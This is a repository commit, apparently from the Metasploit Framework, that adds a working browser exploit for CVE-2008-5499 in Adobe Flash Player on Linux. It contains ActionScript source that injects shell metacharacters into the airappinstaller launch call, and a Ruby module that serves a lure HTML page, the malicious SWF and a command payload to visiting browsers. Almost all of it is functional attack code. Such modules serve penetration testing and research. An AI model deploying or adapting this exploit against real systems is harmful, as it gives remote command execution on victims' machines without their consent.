new file: data/exploits/CVE-2008-5499.swf
new file: external/source/exploits/CVE-2008-5499/Exploit.as new file: modules/exploits/linux/browser/adobe_flashplayer_aslaunch.rbunstable
parent
05eba0ab4c
commit
654701f1b2
Binary file not shown.
|
@ -0,0 +1,44 @@
|
|||
/*
|
||||
Compile: mtasc -version 8 -swf Exploit.swf -main -header 800:600:20 Exploit.as
|
||||
Author: 0a29406d9794e4f9b30b3c5d6702c708 / Unknown / metasploit
|
||||
PoC: http://downloads.securityfocus.com/vulnerabilities/exploits/32896.as
|
||||
*/
|
||||
import flash.external.ExternalInterface;
|
||||
class Exploit {
|
||||
public function randname(newLength:Number):String{
|
||||
var a:String = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";
|
||||
var alphabet:Array = a.split("");
|
||||
var randomLetter:String = "";
|
||||
for (var i:Number = 0; i < newLength; i++){
|
||||
randomLetter += alphabet[Math.floor(Math.random() * alphabet.length)];
|
||||
}
|
||||
return randomLetter;
|
||||
}
|
||||
|
||||
public function exploit() {
|
||||
|
||||
var path:String = ExternalInterface.call("window.location.href.toString") + randname(6) + ".txt";
|
||||
var loadVars:LoadVars = new LoadVars();
|
||||
loadVars.onData = function(str:String):Void {
|
||||
if (str) {
|
||||
if (_global.ASnative(2201, 1)("airappinstaller")) {
|
||||
_global.ASnative(2201, 2)("airappinstaller", "; " + str);
|
||||
}
|
||||
} else {
|
||||
// FAIL
|
||||
}
|
||||
}
|
||||
loadVars.load(path);
|
||||
}
|
||||
|
||||
public function Exploit() {
|
||||
exploit()
|
||||
}
|
||||
|
||||
static function main() {
|
||||
var ex : Exploit;
|
||||
ex = new Exploit();
|
||||
}
|
||||
}
|
||||
|
||||
|
|
@ -0,0 +1,114 @@
|
|||
##
|
||||
# $Id: $
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = GoodRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpServer::HTML
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Adobe Flash Player ActionScript Launch Command Execution Vulnerability',
|
||||
'Description' => %q{
|
||||
This module exploits a vulnerability in Adobe Flash Player for Linux, version
|
||||
10.0.12.36 and 9.0.151.0 and prior.
|
||||
An input validation vulnerability allows command execution when the browser loads
|
||||
a SWF file which contains shell metacharacters in the arguments to the ActionScript launch method.
|
||||
|
||||
The victim must have Adobe AIR installed for the exploit to work. This module was tested against
|
||||
version 10.0.12.36 (10r12_36).
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'0a29406d9794e4f9b30b3c5d6702c708', # Metasploit version
|
||||
'Unknown' # PoC
|
||||
],
|
||||
'Version' => '$Revision: $',
|
||||
'References' =>
|
||||
[
|
||||
['CVE', '2008-5499'],
|
||||
['OSVDB', '50796'],
|
||||
['URL', 'http://www.adobe.com/support/security/bulletins/apsb08-24.html'],
|
||||
['POC', 'http://www.securityfocus.com/bid/32896/exploit'],
|
||||
],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'HTTP::compression' => 'gzip',
|
||||
'HTTP::chunked' => true,
|
||||
},
|
||||
'Platform' => 'unix', # so unix cmd exec payloads are ok
|
||||
'Arch' => ARCH_CMD,
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Automatic', {}],
|
||||
],
|
||||
'DisclosureDate' => 'Dec 17 2008',
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
end
|
||||
|
||||
def exploit
|
||||
path = File.join( Msf::Config.install_root, "data", "exploits", "CVE-2008-5499.swf" )
|
||||
fd = File.open( path, "rb" )
|
||||
@swf = fd.read(fd.stat.size)
|
||||
fd.close
|
||||
|
||||
super
|
||||
end
|
||||
|
||||
def on_request_uri(cli, request)
|
||||
trigger = @swf
|
||||
trigger_file = rand_text_alpha(rand(6)+3) + ".swf"
|
||||
|
||||
obj_id = rand_text_alpha(rand(6)+3)
|
||||
|
||||
if request.uri.match(/\.swf/i)
|
||||
print_status("Sending Exploit SWF")
|
||||
send_response(cli, trigger, { 'Content-Type' => 'application/x-shockwave-flash' })
|
||||
return
|
||||
end
|
||||
|
||||
if request.uri.match(/\.txt/i)
|
||||
send_response(cli, payload.encoded, { 'Content-Type' => 'text/plain' })
|
||||
return
|
||||
end
|
||||
|
||||
html = <<-EOS
|
||||
<html>
|
||||
<head>
|
||||
</head>
|
||||
<body>
|
||||
<center>
|
||||
<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000"
|
||||
id="#{obj_id}" width="600" height="400"
|
||||
codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab">
|
||||
<param name="movie" value="#{get_resource}#{trigger_file}" />
|
||||
<embed src="#{get_resource}#{trigger_file}" quality="high"
|
||||
width="320" height="300" name="#{obj_id}" align="middle"
|
||||
allowNetworking="all"
|
||||
type="application/x-shockwave-flash"
|
||||
pluginspage="http://www.macromedia.com/go/getflashplayer">
|
||||
</embed>
|
||||
|
||||
</object>
|
||||
</center>
|
||||
|
||||
</body>
|
||||
</html>
|
||||
EOS
|
||||
|
||||
print_status("Sending #{self.name} HTML to #{cli.peerhost}:#{cli.peerport}")
|
||||
send_response(cli, html, { 'Content-Type' => 'text/html' })
|
||||
end
|
||||
end
|
Loading…
Reference in New Issue